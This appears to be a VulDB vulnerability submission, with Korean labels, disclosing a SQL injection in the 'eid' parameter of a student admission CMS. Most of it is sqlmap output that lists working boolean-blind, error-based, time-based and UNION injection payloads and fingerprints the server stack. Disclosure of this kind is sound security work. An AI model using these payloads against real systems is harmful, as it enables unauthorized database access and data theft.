| 제목 | Student-Admission CMS Sqlinjection |
|---|
| 설명 | Student-Admission CMS Sqlinjection
```
[11:29:01] [INFO] GET parameter 'eid' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'eid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 142 HTTP(s) requests:
---
Parameter: eid (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: a=edit&eid=(SELECT (CASE WHEN (5950=5950) THEN 8 ELSE (SELECT 9749 UNION SELECT 6556) END))
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: a=edit&eid=8 OR (SELECT 5422 FROM(SELECT COUNT(*),CONCAT(0x717a766a71,(SELECT (ELT(5422=5422,1))),0x7170707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: a=edit&eid=8 AND (SELECT 8871 FROM (SELECT(SLEEP(5)))pMGL)
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: a=edit&eid=-4536 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a766a71,0x4764484f4a426d4d6147624c54525076594d64476745676f7750505173707247795a6c584d434842,0x7170707871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[11:29:02] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9, Apache 2.4.39
back-end DBMS: MySQL >= 5.0
``` |
|---|
| 원천 | ⚠️ https://github.com/gdianq/Student-Admission-CMS-Sqlinjection/blob/main/README.md |
|---|
| 사용자 | gdianq (UID 30613) |
|---|
| 제출 | 2022. 08. 04. AM 07:51 (4 연령 ago) |
|---|
| 모더레이션 | 2022. 08. 04. AM 07:54 (3 minutes later) |
|---|
| 상태 | 중복 |
|---|
| VulDB 항목 | 205565 [SourceCodester Online Admission System GET Parameter eid SQL 주입] |
|---|
| 포인트들 | 0 |
|---|